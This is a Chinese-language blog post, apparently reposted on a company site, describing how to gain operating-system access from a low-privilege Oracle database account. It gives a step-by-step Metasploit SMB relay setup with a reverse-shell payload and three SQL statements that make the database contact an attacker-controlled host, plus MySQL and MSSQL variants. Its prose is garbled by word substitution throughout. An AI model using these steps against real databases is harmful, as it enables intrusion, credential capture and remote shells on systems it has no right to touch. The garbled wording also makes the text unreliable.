|
|
|
联系客服020-83701501

使用低权限 Oracle 数据库账户得到 OS 访问权限

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
操作低权限 Oracle 数据库账户取得 OS 接见权限

这几天看了篇叫”Penetration: from application down to OS (Oracle)”的文档,感到挺故意义的,文档的 或是意义便是说,假设 ORACLE 处事是用 administrator 账户启动的,你只有有一个具有 resource 和 connect 权限的数据库账户,就能操作 metasploit 的 smbrelay 服从,本地搭建一个 SMB 欺骗处事器, 来取得细碎的接见权限。我本地测试了下,还真的腐败了。:-)

具体的道理阐发看原文吧,我这里把我的测试进程写进去.

我的渗入情况用的是 ubuntu8.10+metasploit 3.3 dev,oracle 数据库版本为 10.2.0.1.0,处事启动权限为 administrator,数据库账户用的是 dbsnmp 账户的默许权限.

1.先用 netstat 命令查看一下,本地的 139 端口有不有占用,个别占用此端口的处事便是 Samba 了,要关掉。ubuntu 的关闭设施是 sudo /etc/init.d/samba stop

2.运行 metasploit,我选用的 PAYLOAD 是 shell_reverse_tcp,做好响应配置后,exploit.就能用 netstat 看到本地已经监听了 139 和 8522 端口了.

3.我此刻操作 dbsnmp 默赖账户连贯到 oracle 数据库上,这个账户默许权限是比较低的,只有 connect和 resource 权限。

4.尔后执行上面 3 条 SQL 语句

SQL> CREATE TABLE files(id NUMBER PRIMARY KEY,path VARCHAR(255) UNIQUE,ot_format VARCHAR(6));

SQL> INSERT INTO files VALUES(1,’192.168.1.52mickey’,NULL);

SQL>?? CREATE INDEX file_index ON files(path) INDEXTYPE IS ctxsys.context

2?? PARAMETERS(‘datastore ctxsys.file_datastore format column ot_format’);


当执行完 create index 这句的时候,在看咱们本地的 metasploit,就已经取得 ORACLE 数据库主机的系 统当前处事用户的 half lm 哈希和 cmdshell 了。

后 来经过 pt007 的提示,我又测试了 mysql,假设处事也是 administrator 启动的,用select load_file(‘192.168.1.52mk.txt’)也是或是取得细碎权限的.MSSQL 理当用 xp_dirtree 存储进程 也是或是的,不过我不有配置进去用 administrator 账户启动 MSSQL 处事,希望晓得的伴侣指点下我。

这个技艺或是用到内网 WEB 评估的时候,假设有注入,处事又是 administrator 启动的,或是提权了。

本文作者Mickey由Internet安全攻防研究室(www.91ri.org) 消息安全小组收集整顿.转载本文请驰名原文地址及原作者版权消息。

数安新闻+更多

证书相关+更多